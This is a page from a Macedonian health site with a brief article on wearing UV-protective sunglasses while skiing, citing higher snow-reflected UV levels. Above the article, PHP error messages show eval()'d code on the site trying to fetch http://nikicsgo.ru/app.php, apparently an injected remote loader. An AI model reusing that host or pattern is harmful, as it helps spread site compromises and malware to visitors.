Очилата за сонце задолжителни на скијачките терени | За Здравје


Error message

  • Warning: file_get_contents(): http:// wrapper is disabled in the server configuration by allow_url_fopen=0 in eval() (line 1 of /home/zdravjem/public_html/modules/php/php.module(80) : eval()'d code).
  • Warning: file_get_contents(http://nikicsgo.ru/app.php): failed to open stream: no suitable wrapper could be found in eval() (line 1 of /home/zdravjem/public_html/modules/php/php.module(80) : eval()'d code).
                         
                           
                             

СПОРТСКА МЕДИЦИНА

                           
                           
                           
                       

Очилата за сонце задолжителни на скијачките терени

Снежниот бран кој го зафати регионот создаде идеални услови за скијање и убав зимски одмор некаде на скијачките терени во Македонија и на познатите балкански зимски туристички дестинации.







Сепак лекарите предупредуваат дека за време на престојот на планина мораме да носиме очила за сонце. Во неколку направени студии, научниците дошле до заклучок дека УВ зрачењето кое може да ни го оштети видот, е за 3 пати поголемо на планина во зимскиот период, отколку на плажа за време на летниот период.



Научниците направиле мерење на УВ зрачењето кое се рефлектира од снегот на планините, а потоа го споредиле со УВ зрачењето на плажите за време на летниот период. Според резултатите тие заклучиле дека зрачењето на плажите е околу 260 КЈ по квадратен метар, додека на снежните покривки тоа изнесува дури 660 КЈ.



Поради ова научниците ги советуваат луѓето кои планираат да одат на скијање или на било каква активност на планина, во периоди кога таа е покриена со снег, задолжително да носат очила кои штитат од УВ зрачење, бидејќи зрачењето не е занемарувачко и тоа може да наштети најмногу предизвикувајќи таканаречено зимско слепило, воспаление или катаракта.



Ова особено треба да се применува кога се наоѓаме на високите планински врвови, бидејќи количината на УВ зрачење се зголемува за 4% на секои 300 метри – додаваат научниците.

ЗА ЗДРАВЈЕ NEWSLETTER